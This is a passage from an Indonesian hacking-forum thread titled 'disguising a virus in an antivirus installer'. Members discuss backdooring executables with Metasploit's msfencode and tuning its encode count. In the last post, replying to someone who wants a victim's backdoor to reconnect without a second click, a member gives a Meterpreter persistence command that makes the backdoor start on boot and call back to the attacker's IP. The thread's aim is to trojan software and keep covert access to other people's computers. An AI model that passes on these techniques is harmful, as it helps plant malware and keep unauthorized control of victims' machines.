[Share] Menyamarkan virus pada Antivirus Installer
#41
Coba Ah ,Lumayan Kenak Cucungup2 Baju Dinas ....

#42
(11-01-2014, 08:50 PM)dharaninja Wrote:
(05-12-2014, 02:09 PM)[H2] Wrote:
(05-04-2014, 10:54 AM)dharaninja Wrote: Keren keren.. Tapi bagaimana agar file exe tidak dapat di inject dengan metasploit ?

maksudnya gak dapat di inject gmana bro @dharaninja ?

Maksudnya gini nih, kan saya bikin program windows berekstensi .exe
Saya mau biar program saya tidak bisa di infeksi oleh virus maupun metasploit. Itu gimana caranya ?

setahu saya ga bisa bro, makanya itu di setiap file yg bisa di download ada juga md5 atau sha1 hashnya utk periksa integritas filenya

atau mungkin teman2 yg lain ada yg tahu caranya?

#43
bisa aja digunakan ke aplikasi lain.
yang perlu diperhatikan itu dibagian msfencode, di option -c 
total encode mempengaruhi file yang dijadikan backdoor.

kalo kelebihan atau kurang, bisa2 exploit atau aplikasi tersebut gak jalan & error.
selamat berkreasi.

#44
(01-10-2015, 05:22 AM)mitchell Wrote: bisa aja digunakan ke aplikasi lain.
yang perlu diperhatikan itu dibagian msfencode, di option -c 
total encode mempengaruhi file yang dijadikan backdoor.

kalo kelebihan atau kurang, bisa2 exploit atau aplikasi tersebut gak jalan & error.
selamat berkreasi.

Yup bro thx udah menambahkan ya
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#45
Om mau nanya kalo misalkan nih ya tuh file backdoor udah di klik orang sekali nah kita mau listenernya besok-besok aja bisa gak om selama dia konek ke internet? ada tutor tambahan om? apa gimana ya om tulung om tulung hehe :3 caranya biar bisa listener lagi tanpa dia klik file backdoor kita lagi gimana om?

#46
Ada kok , automatic backdoor running in OS .Mas je echel udah pernah POST kok Threadnya

https://indonesianbacktrack.or.id/forum/...ing+access

ituh atuh , Kalo gambarnya ga kebaca disitukan ada Original postnya , Open aja

#47
(03-10-2015, 04:21 PM)Psytrap Wrote: Om mau nanya kalo misalkan nih ya tuh file backdoor udah di klik orang sekali nah kita mau listenernya besok-besok aja bisa gak om selama dia konek ke internet?  ada tutor tambahan om? apa gimana ya om tulung om tulung hehe :3 caranya biar bisa listener lagi tanpa dia klik file backdoor kita lagi gimana om?

oh mungkin maksudnya biar jadi starup ya backdoornya?, nih tambahin aja sebelum exit console "run persistence -U i 5 -p (port) -r ( ip kita)"

semoga bermanfaat





Users browsing this thread: 2 Guest(s)